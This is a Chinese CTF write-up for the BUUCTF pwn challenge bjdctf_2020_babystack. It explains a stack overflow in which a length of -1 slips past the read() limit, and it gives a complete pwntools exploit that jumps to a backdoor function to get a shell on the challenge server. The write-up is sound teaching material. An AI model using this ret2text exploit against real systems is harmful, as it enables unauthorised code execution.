bjdctf_2020_babystack

使用checksec查看：

只开启了栈不可执行。

放进IDA中分析：

__isoc99_scanf("%d", &nbytes);：让用户输入下次输入时接受的数据的长度。
read(0, &buf, (unsigned int)nbytes);：变量nbytes用户可控，存在栈溢出。

在Functions name处可发现后门函数backdoor()：

直接返回一个shell

题目思路

变量(unsigned int)nbytes用户可控，且是个无符号函数。
可用-1进行绕过，这样用户可输入的数据长度就十分巨大了。
接着调用backdoor()即可getshell。

步骤解析

无需

完整exp

from pwn import *#start
# r = process("../buu/bjdctf_2020_babystack")
r = remote("node4.buuoj.cn",25148)
elf = ELF("../buu/bjdctf_2020_babystack")#params
backdoor_addr = elf.symbols['backdoor']#attack
r.recvuntil(b"your name:")
r.sendline("-1")
r.recvuntil(b"name?")
payload = b'M' * (0x10 + 8) + p64(backdoor_addr)
r.sendline(payload)r.interactive()

bjdctf_2020_babystack相关推荐

[BUUCTF-pwn]——bjdctf_2020_babystack
[BUUCTF-pwn]--bjdctf_2020_babystack 题目地址:https://buuoj.cn/challenges#bjdctf_2020_babystack Linux中che ...
【BUUCTF】bjdctf_2020_babystack Write Up
继续刷buuoj中- 看到上新题了,是当时比赛的时候做过的一道题,顺手打掉程序只开了NX保护,读入字符数可控,直接ret2text解决遇到的小问题是,本地环境打0x4006E6打不通,换成了0x4 ...
buuctf bjdctf_2020_babystack wp
前期准备没开啥看看ida 发现有sh字符串漏洞及利用思路稍微看看这个主函数就知道他在干嘛了,先问你名字长度是多少,再用你输入的这个值去限制读取位数,说白了就是没限制,所以只要造成缓冲区溢出,覆 ...
PWN-PRACTICE-BUUCTF-4
PWN-PRACTICE-BUUCTF-4 ciscn_2019_en_2 bjdctf_2020_babystack not_the_same_3dsctf_2016 [HarekazeCTF201 ...
持续更新 BUUCTF——PWN（一）
文章目录前言 test_your_nc rip warmup_csaw_2016 ciscn_2019_n_1 pwn1_sctf_2016 jarvisoj_level0 [第五空间2019 决赛 ...
BUUCTF PWN 刷题 1-15题
1 rip 经典栈溢出漏洞. from pwn import *p = remote('node4.buuoj.cn', 27181)payload = b'a' * 23 + p64(0x40118 ...
buuctf（pwn）
胖胖 pwn1_sctf_2016 ciscn_2019_n_11 补充movss /ucomiss jarvisoj_level0 ciscn_2019_c_1 babyrop [第五空间2019 ...

bjdctf_2020_babystack

bjdctf_2020_babystack

bjdctf_2020_babystack相关推荐

最新文章

热门文章